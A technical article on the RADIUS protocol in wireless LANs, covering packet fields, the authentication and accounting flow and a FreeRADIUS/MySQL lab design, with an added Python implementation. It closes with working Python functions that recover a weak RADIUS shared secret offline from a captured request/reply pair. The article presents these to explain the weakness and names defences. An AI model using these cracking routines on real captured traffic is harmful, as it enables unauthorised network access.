Principles and implementation of RADIUS protocol in Wireless LAN

Source: Internet
Author: User
Tags: freeradius

Abstract: RADIUS is a protocol widely used for network authentication, authorization, and accounting (billing). Starting from the principles of the RADIUS protocol, this article analyzes the protocol and designs an implementation of it for a wireless LAN.

1 Introduction

Remote Authentication Dial-In User Service (RADIUS) was initially proposed by Livingston Enterprises to provide authentication and accounting for dial-up users. After many revisions it has become a general-purpose network authentication and accounting protocol, defined in RFC 2865 (authentication) and RFC 2866 (accounting), published by the IETF. RADIUS works in client/server mode: the client is the Network Access Server (NAS), which submits authentication, accounting and other information to the RADIUS server; the server processes the information and returns the result to the NAS.

The RADIUS protocol is widely used in mobile, data, and intelligent-network authentication and accounting systems. In the 802.1X authentication framework for wireless LANs, RADIUS is also the recommended protocol between the authenticator and the authentication server.

This article first discusses the principles of the RADIUS protocol, then its application and an implementation scheme in a WLAN.

2 RADIUS protocol

2.1 WLAN Network Model

For a commercial wireless LAN, LAN switches can implement the port control of the 802.1X authentication protocol. To protect the network, a firewall is added at the egress and in front of the authentication end of the wireless LAN. The RADIUS servers and databases can also be deployed in a master-slave (primary/standby) structure so that the network remains robust.

Figure 1 shows the network model:


Figure 1 Wireless LAN Network Model

The authentication end of the wireless LAN is composed of a RADIUS server, a network access server (NAS), and a database, where:

NAS: acts as the client of the RADIUS server and forwards the user's authentication information to it. After the user is authenticated, the NAS sends accounting (billing) information to the RADIUS server.

RADIUS server: the central server of the authentication system, connected to the NAS and to the database. It accepts information submitted by the NAS, performs the corresponding operations on the database, and returns the result to the NAS.

Database: stores all user information, accounting information and other information. User information is entered by the network administrator; accounting information comes from the RADIUS server; other information includes log records.

2.2 RADIUS packet structure

RADIUS is an application-layer protocol. At the transport layer its packets are carried in UDP datagrams, which are in turn carried in IP packets. UDP port 1812 is used for RADIUS authentication and port 1813 for accounting. (Early deployments used ports 1645 and 1646; RFC 2865 notes that 1645 conflicts with the "datametrics" service and that 1812 is the officially assigned port, so both pairs are still seen in practice.)

The packet structure after RADIUS is encapsulated on Ethernet is shown below:


A RADIUS packet is divided into five fields:

(1) Code: 1 byte, identifies the type of RADIUS packet. Common types are:

Access-Request, Code = 1; Access-Accept, Code = 2; Access-Reject, Code = 3; Accounting-Request, Code = 4; Accounting-Response, Code = 5; Access-Challenge, Code = 11. A packet with an unknown Code is silently discarded.

(2) Identifier: 1 byte, used to match requests with their responses. The NAS changes it whenever the content of a request changes, and the server copies it into the reply.

(3) Length: 2 bytes, the length in bytes of the whole RADIUS packet (Code, Identifier, Length, Authenticator and Attributes). The minimum value is 20 and the maximum is 4096. Bytes received beyond the Length are treated as padding and ignored, and a packet shorter than its Length field is discarded.

(4) Authenticator: 16 bytes, used to verify the server's response and also to hide the user password. In an Access-Request it is the Request Authenticator, a random, unpredictable value chosen by the NAS. In every response it is the Response Authenticator, MD5(Code | Identifier | Length | Request Authenticator | Attributes | shared secret), so the NAS can check that the reply was produced by a server holding the shared secret and was not modified in transit. The shared secret is configured on both the NAS and the RADIUS server and is never sent on the wire. (An Accounting-Request carries a Request Authenticator computed the same way, with 16 zero bytes in place of the Request Authenticator, which lets the server check it.) The user password is not transmitted in clear text between the NAS and the RADIUS server: it is padded to 16-byte blocks and XORed with MD5(shared secret | Request Authenticator), each further block using the previous hidden block in place of the Request Authenticator. MD5 is a keystream generator here, not an encryption algorithm, so the hiding is only as strong as the shared secret and the randomness of the Request Authenticator.

(5) Attributes: zero or more attributes, each encoded as Type (1 byte), Length (1 byte, counting the Type and Length bytes) and Value. The RADIUS attributes, such as User-Name, User-Password, NAS-IP-Address and Framed-IP-Address, are carried in this field; its minimum length is 0 bytes.

2.3 RADIUS authentication and accounting process

Using the network model of Figure 1, the process is as follows:

(1) When the applicant (supplicant) connects to the network, the NAS shows a user-defined login prompt asking for the user's information (user name and password). The applicant enters the information and waits for the authentication result.

(2) After obtaining the user information, the NAS sends an Access-Request packet in the RADIUS packet format to the RADIUS server. The packet usually carries the following attributes: User-Name, User-Password (hidden as described in 2.2), NAS-IP-Address (or NAS-Identifier) and NAS-Port.

(3) When the RADIUS server receives the Access-Request, it first checks that the packet comes from a configured RADIUS client: the client is identified by its source address, and the shared secret configured for that client is used for everything that follows; a request from an unknown client is silently discarded. (In the base protocol there is no direct check of the shared secret on an Access-Request, because the Request Authenticator is random; a mismatched secret simply turns the recovered password into garbage, which ends in a reject. The Message-Authenticator attribute of RFC 2869 adds an explicit integrity check.) After checking that the packet is well formed, the server recovers the user password and looks the user name up in the user database. If the user does not exist or the credentials do not match, an Access-Reject is returned to the NAS. On receiving it, the NAS immediately stops service on the user's port and the user is disconnected.

(4) If further verification is required, the server can answer with an Access-Challenge instead. The challenge carries a Reply-Message (the text to show the user) and a State attribute. The NAS displays the message to the user, collects the user's response, and sends a new Access-Request with the response in User-Password, a new Identifier and Request Authenticator, and the State attribute copied back unchanged. The RADIUS server compares the response and decides how to answer (Access-Accept, Access-Reject, or another Access-Challenge).

(5) When all checks and any challenge exchanges have passed, the RADIUS server places the user's configuration information from the database in an Access-Accept packet and returns it to the NAS, which restricts the user's network access according to that configuration. It includes the Service-Type (Login, Framed, Callback and so on), the Framed-Protocol (PPP, SLIP), the Login-Service (Telnet, Rlogin) and configuration tied to the service type, such as the Framed-IP-Address and the Session-Timeout.

(6) After authentication and authorization are complete, the controlled port of the LAN switch is opened and the user can reach the network through the switch. At the same time the NAS sends an Accounting-Request packet with Acct-Status-Type = Start to the RADIUS server to begin accounting, and the server acknowledges it with an Accounting-Response. When the user goes offline, the NAS sends an Accounting-Request with Acct-Status-Type = Stop carrying the session time and traffic counters, and the RADIUS server calculates the network usage fee from this information.
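The packet format of section 2.2 and the exchange of steps (2) to (6) above, carried out end to end in one process, as an added example (this is the editor's illustration, not code from the original article or from FreeRADIUS). The USERS and CLIENTS tables and the accounting values are constructed stand-ins for the database tables of section 3.4; the NAS address 192.0.2.10 and the secret "testing123" are assumptions. The server_handle function is what a UDP listener on ports 1812/1813 (section 3.3) would call for each datagram; here the NAS calls it directly. Note how the server discards packets from unknown clients without replying, how the NAS drops a reply whose Response Authenticator does not verify, and how an Accounting-Request with a wrong secret gets no Accounting-Response at all.

```python
import hashlib
import os
import struct

# Packet codes (RFC 2865 / RFC 2866) and the attribute numbers used below.
ACCESS_REQUEST, ACCESS_ACCEPT, ACCESS_REJECT, ACCOUNTING_REQUEST, ACCOUNTING_RESPONSE = 1, 2, 3, 4, 5
USER_NAME, USER_PASSWORD, NAS_IP_ADDRESS, SERVICE_TYPE, FRAMED_IP_ADDRESS, SESSION_TIMEOUT = 1, 2, 4, 6, 8, 27
ACCT_STATUS_TYPE, ACCT_INPUT_OCTETS, ACCT_OUTPUT_OCTETS, ACCT_SESSION_ID, ACCT_SESSION_TIME = 40, 42, 43, 44, 46
ACCT_START, ACCT_STOP, ZERO_AUTH = 1, 2, bytes(16)
# Constructed stand-ins (not real data) for the user table, the NAS table and the accounting records of section 3.4.
USERS, CLIENTS, ACCOUNTING_LOG = {b"alice": b"wlan-pass"}, {"192.0.2.10": b"testing123"}, {}

def encode_attrs(attrs):
    out = b""
    for atype, value in attrs:
        value = struct.pack("!I", value) if isinstance(value, int) else value   # ints are 4-byte big-endian
        out += struct.pack("!BB", atype, 2 + len(value)) + value               # Type | Length | Value
    return out

def decode_attrs(body):
    attrs = {}
    while body:
        if len(body) < 2 or body[1] < 2 or body[1] > len(body):
            raise ValueError("malformed attribute")
        attrs[body[0]] = body[2:body[1]]
        body = body[body[1]:]
    return attrs

def parse_packet(raw):
    """Split a packet into (code, identifier, authenticator, attribute bytes)."""
    code, ident, length = struct.unpack("!BBH", raw[:4])
    if not 20 <= length <= 4096 or length > len(raw):   # RFC 2865: bytes past Length are padding, short packets are dropped
        raise ValueError("bad RADIUS length")
    return code, ident, raw[4:20], raw[20:length]

def password_xor(data, secret, request_auth, hiding):
    """RFC 2865 5.2: XOR each 16-byte block with MD5(secret + previous cipher block), the first with the Request Authenticator."""
    data = data + b"\x00" * (-len(data) % 16)
    out, prev = b"", request_auth
    for i in range(0, len(data), 16):
        block = bytes(a ^ b for a, b in zip(data[i:i + 16], hashlib.md5(secret + prev).digest()))
        out, prev = out + block, (block if hiding else data[i:i + 16])
    return out if hiding else out.rstrip(b"\x00")

def authenticator(code, ident, request_auth, body, secret):
    """MD5(Code | ID | Length | RequestAuth | Attributes | Secret); an Accounting-Request uses ZERO_AUTH as RequestAuth (RFC 2866)."""
    return hashlib.md5(struct.pack("!BBH", code, ident, 20 + len(body)) + request_auth + body + secret).digest()

def build_packet(code, ident, auth, body):
    return struct.pack("!BBH", code, ident, 20 + len(body)) + auth + body

def build_reply(code, ident, request_auth, body, secret):
    return build_packet(code, ident, authenticator(code, ident, request_auth, body, secret), body)

def nas_access_request(ident, username, password, secret):
    ra = os.urandom(16)                    # Request Authenticator: must be unpredictable
    body = encode_attrs([(USER_NAME, username), (USER_PASSWORD, password_xor(password, secret, ra, True)),
                         (NAS_IP_ADDRESS, bytes([192, 0, 2, 10]))])
    return build_packet(ACCESS_REQUEST, ident, ra, body), ra

def nas_accounting_request(ident, attrs, secret):
    body = encode_attrs(attrs)
    return build_packet(ACCOUNTING_REQUEST, ident, authenticator(ACCOUNTING_REQUEST, ident, ZERO_AUTH, body, secret), body)

def nas_check_reply(raw, request_auth, secret):
    """The NAS accepts a reply only if its Response Authenticator verifies; anything else is dropped."""
    code, ident, auth, body = parse_packet(raw)
    return code if authenticator(code, ident, request_auth, body, secret) == auth else None

def server_handle(raw, src_ip):
    secret = CLIENTS.get(src_ip)
    if secret is None:
        return None                        # unknown client: silently discard (RFC 2865 section 3)
    code, ident, auth, body = parse_packet(raw)
    attrs = decode_attrs(body)
    if code == ACCESS_REQUEST:
        if USERS.get(attrs.get(USER_NAME)) != password_xor(attrs.get(USER_PASSWORD, b""), secret, auth, False):
            return build_reply(ACCESS_REJECT, ident, auth, b"", secret)
        grant = encode_attrs([(SERVICE_TYPE, 2), (FRAMED_IP_ADDRESS, bytes([10, 1, 0, 5])), (SESSION_TIMEOUT, 3600)])
        return build_reply(ACCESS_ACCEPT, ident, auth, grant, secret)
    if code == ACCOUNTING_REQUEST:
        if authenticator(code, ident, ZERO_AUTH, body, secret) != auth:
            return None                    # wrong secret or altered packet: discard, send no reply
        status = struct.unpack("!I", attrs[ACCT_STATUS_TYPE])[0]
        usage = [struct.unpack("!I", attrs[t])[0] for t in (ACCT_SESSION_TIME, ACCT_INPUT_OCTETS, ACCT_OUTPUT_OCTETS) if t in attrs]
        ACCOUNTING_LOG.setdefault(attrs[ACCT_SESSION_ID], {})[status] = usage   # counters are present only in Stop
        return build_reply(ACCOUNTING_RESPONSE, ident, auth, b"", secret)

def run_session(username, password, nas_ip="192.0.2.10"):
    """The NAS <-> server exchange of steps (2) to (6) in one process; returns the reply codes the NAS saw."""
    secret = CLIENTS[nas_ip]
    request, ra = nas_access_request(1, username, password, secret)
    access = nas_check_reply(server_handle(request, nas_ip), ra, secret)
    if access != ACCESS_ACCEPT:
        return access, None, None
    start = nas_accounting_request(2, [(USER_NAME, username), (ACCT_STATUS_TYPE, ACCT_START), (ACCT_SESSION_ID, b"s1")], secret)
    start_rc = nas_check_reply(server_handle(start, nas_ip), start[4:20], secret)
    stop = nas_accounting_request(3, [(USER_NAME, username), (ACCT_STATUS_TYPE, ACCT_STOP), (ACCT_SESSION_ID, b"s1"),
                                      (ACCT_SESSION_TIME, 1800), (ACCT_INPUT_OCTETS, 5000), (ACCT_OUTPUT_OCTETS, 120000)], secret)
    stop_rc = nas_check_reply(server_handle(stop, nas_ip), stop[4:20], secret)
    return access, start_rc, stop_rc
```

Calling run_session(b"alice", b"wlan-pass") returns the codes (2, 5, 5), that is Access-Accept followed by two Accounting-Responses, and leaves the Stop record's session time and octet counters in ACCOUNTING_LOG for the fee calculation of section 3.3; run_session(b"alice", b"wrong") returns (3, None, None). The random Request Authenticator matters: if a NAS reused one, the same MD5 keystream would hide every password, and an attacker knowing one password could read the others.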

3 Design and implementation of a RADIUS authentication system in the WLAN model

3.1 Simplified WLAN network model

In the simulated lab environment there are few network users, so a small or medium-sized database can store the required information, and the RADIUS server and the database can run on the same host. LAN switches implement port control. The network structure simplifies to the following:


Figure 2 WLAN Network Model in a lab environment

3.2 NAS design

(1) RADIUS client program: receives information from the applicant, submits authentication, accounting, management and other packets to the RADIUS server, and returns the corresponding results to the applicant.

(2) Server management program: to make it easy for the administrator to manage the RADIUS server and the database, the server management program can also run on the NAS host. Its functions include: an administrator module (add or delete network administrators, set administrator permissions, and so on); a user information module (query, add and delete users); a billing information module (query user billing information; create, modify and delete billing schemes); and a log information module.

(3) Submission of user information: the user's information has to reach the NAS, and there are several ways to do this. The simplest is web-based submission: a web server is set up on the NAS so that the user can interact with the NAS directly from a browser. After receiving the information submitted by the user, the web server passes it to the RADIUS client program, which encapsulates it in the RADIUS Access-Request format and sends the authentication request to the RADIUS server on the authentication port (1812). Since the applicant's password travels over the wireless link to this web server, the form should be served over HTTPS; RADIUS only hides the password on the NAS-to-server leg.

(4) Submission of accounting information: after authentication succeeds, the NAS client sends an Accounting-Request Start packet containing the user name, the user's IP address and the session start time to the RADIUS server on the accounting port (1813), telling the server to begin accounting. The RADIUS server records the corresponding items in the database and returns an Accounting-Response. When the user goes offline, the NAS sends an Accounting-Request Stop packet containing the end time and the data traffic to the RADIUS server, which again returns an Accounting-Response as confirmation.

(5) Submission of server management requests: the management program's requests are submitted to the RADIUS server through the RADIUS client program, which packs them into the standard RADIUS packet format and sends them to a port number defined for server administration.

3.3 RADIUS server design

The RADIUS server processes the various packets from the NAS, performs the database operations, and returns the corresponding results. The protocol communication between the RADIUS client and the server is implemented with socket programming.

(1) Database operations: the RADIUS server connects to the database through the database interface. The required database operation modules (such as querying, adding and modifying user, billing and administrator information) are implemented with SQL statements on the RADIUS server, and the server calls the corresponding module whenever it needs to operate on the database.

(2) Authentication packet handling: the server listens on the authentication port (1812) for the authentication packets submitted by the NAS. After receiving one, it queries the database to verify the user and returns the result from port 1812 as a RADIUS packet. Multi-threaded processing is used so that requests from many users can be handled concurrently.

(3) Accounting packet handling: when a user has passed authentication, the server looks up the user's billing information and determines the billing type and rate. After receiving the Accounting-Request Start packet from the NAS on the accounting port (1813), it records the information submitted in that packet, including the user name and the session start time, in the database. When the Accounting-Request Stop packet arrives because the user has gone offline, the user's session duration and data traffic are calculated from the end time and traffic counters submitted in the packet, the fee is computed according to the user's billing type, and the result is recorded in the database.

(4) Server management request handling: the server listens on a custom port for the management program's requests. After receiving a request, it unpacks it and executes the corresponding handler.

3.4 Database design

The database stores all user information and accounting information. Its tables should include at least the following:

(1) User information: user name, password, authentication method, access permission, and payment method.

(2) Authorization information: the configuration information the server returns for the user, such as the service type and session time.

(3) Accounting information: the statistics related to billing, such as online time, billing rate, user data traffic and fees, account balance, and so on.

(4) Administrator information: the administrator's ID and password, and the administrator's permissions.

(5) NAS information: one record for each NAS served by the RADIUS server, including the ID of the NAS and the shared secret it uses with the RADIUS server.

(6) Log information: the users' online history and the login and operation records of the network administrators.

3.5 Implementation of each part of the authentication end

Operating system: both the RADIUS server and the NAS run Linux (Red Hat 9.0, kernel 2.4.20-8).

(1) NAS:

Apache and Tomcat are used to build a web server that supports JSP, so that the applicant can submit login information through a web page. The server management program handles the system administrator's operations, with its user interface written in Qt 3.0. The RADIUS client program (implemented in C) encapsulates the messages submitted by the user or the system administrator into RADIUS packets and forwards them to the RADIUS server on the corresponding port.

(2) Database:

MySQL is a multi-user, multi-threaded SQL database server consisting of the server daemon mysqld and many client programs and libraries. Red Hat 9.0 ships MySQL; once the service is started, the RADIUS server is connected to it and a user database and an accounting database are created, so that user and accounting information can be managed effectively.

(3) RADIUS server:

FreeRADIUS 0.9.0 is used to build the RADIUS server and implement the RADIUS protocol; the server verifies the applicant's user name and password (the original text calls this the EAP-identity method, but strictly EAP-Identity only carries the identity, and the credential itself is checked by the configured password method). FreeRADIUS is open source and can be downloaded from www.freeradius.org. Note that 0.9.0 dates from 2003 and is long unsupported, so any real deployment should use a current 3.x release. In addition, a database processing module and a server management processing module were added to the FreeRADIUS source code.

FreeRADIUS supports SQL databases. First create the radius database and load the schema (for MySQL: mysql -u root -p radius < db_mysql.sql; enter the password interactively rather than writing it after -p, so that it does not end up in the shell history and process list). The schema creates the following tables: radcheck: per-user check attributes, which specify how the user is authenticated (for example the password); radreply: per-user reply attributes; radgroupcheck: check attributes for each user group, for example a group whose default result is accept or reject; radgroupreply: reply attributes for each user group; usergroup: the mapping between users and groups; radacct: the accounting statistics. Other tables can be added as needed.

4 Conclusion

The RADIUS protocol was initially used in dial-up networks and, thanks to its ease of management and good scalability, has become the authentication, authorization and accounting protocol of many kinds of networks. However, it still has security weaknesses: an offline dictionary attack on the shared secret using a captured Response Authenticator, and attacks on user passwords through the User-Password hiding, which depends on the same shared secret and on the Request Authenticator being truly random. These issues need further research and improvement.
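The two weaknesses named in this conclusion, shown on a constructed capture as an added example (the editor's illustration, not code or results from the original article). capture_exchange builds an Access-Request / Access-Accept pair in-process with the real secret, standing in for a packet capture on the NAS-to-server link; WORDLIST is a constructed dictionary and "alice-pw" an assumed password. The point is that everything in MD5(Code | ID | Length | Request Authenticator | Attributes | secret) except the secret is on the wire, so each guess costs one MD5 and needs no further contact with the server; the User-Password hiding gives an attacker who knows one password (their own account) the same one-MD5-per-guess check. The defence is a long random shared secret (RFC 2865 asks for at least 16 octets) and protecting the NAS-to-server link with IPsec or RADIUS over TLS (RFC 6614); the Message-Authenticator of RFC 2869 authenticates packets but is equally subject to offline guessing of a weak secret.

```python
import hashlib
import os
import struct

USER_PASSWORD = 2
# Constructed wordlist standing in for a real dictionary; "testing123" is a widely used default secret.
WORDLIST = [b"password", b"radius", b"secret", b"testing123", b"s3cr3t"]

def capture_exchange(secret, known_password=b"alice-pw", ident=7):
    """Constructed stand-in for a sniffed Access-Request / Access-Accept pair (the real thing comes from tcpdump)."""
    assert len(known_password) <= 16           # one hidden block is all the attack needs
    request_auth = os.urandom(16)
    padded = known_password + b"\x00" * (16 - len(known_password))
    hidden = bytes(a ^ b for a, b in zip(padded, hashlib.md5(secret + request_auth).digest()))
    body = struct.pack("!BB", USER_PASSWORD, 2 + len(hidden)) + hidden
    request = struct.pack("!BBH", 1, ident, 20 + len(body)) + request_auth + body
    reply_header = struct.pack("!BBH", 2, ident, 20)   # attribute-free Access-Accept
    reply = reply_header + hashlib.md5(reply_header + request_auth + secret).digest()
    return request, reply

def attribute(body, wanted):
    """Return the value of the first Type | Length | Value attribute of type `wanted`, or None."""
    while len(body) >= 2 and body[1] >= 2:
        if body[0] == wanted:
            return body[2:body[1]]
        body = body[body[1]:]
    return None

def crack_via_response_authenticator(request, reply, wordlist):
    """Offline dictionary attack on the shared secret: recompute the Response Authenticator per candidate."""
    request_auth, reply_auth, reply_attrs = request[4:20], reply[4:20], reply[20:]
    for candidate in wordlist:
        if hashlib.md5(reply[:4] + request_auth + reply_attrs + candidate).digest() == reply_auth:
            return candidate
    return None

def crack_via_user_password(request, known_password, wordlist):
    """Same attack using a captured Access-Request whose password the attacker knows (their own account):
    the first hidden block is pad16(password) XOR MD5(secret + RequestAuth)."""
    request_auth = request[4:20]
    hidden = attribute(request[20:], USER_PASSWORD)
    target = (known_password + b"\x00" * 16)[:16]
    for candidate in wordlist:
        stream = hashlib.md5(candidate + request_auth).digest()
        if bytes(a ^ b for a, b in zip(hidden[:16], stream)) == target:
            return candidate
    return None
```

With the secret "testing123" both functions recover it from a single captured pair; with a 24-byte random secret that is not in the dictionary both return None, which is the whole difference a strong secret makes against this class of attack. Real attacks run the same loop over millions of candidates, and nothing in the protocol rate-limits them.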
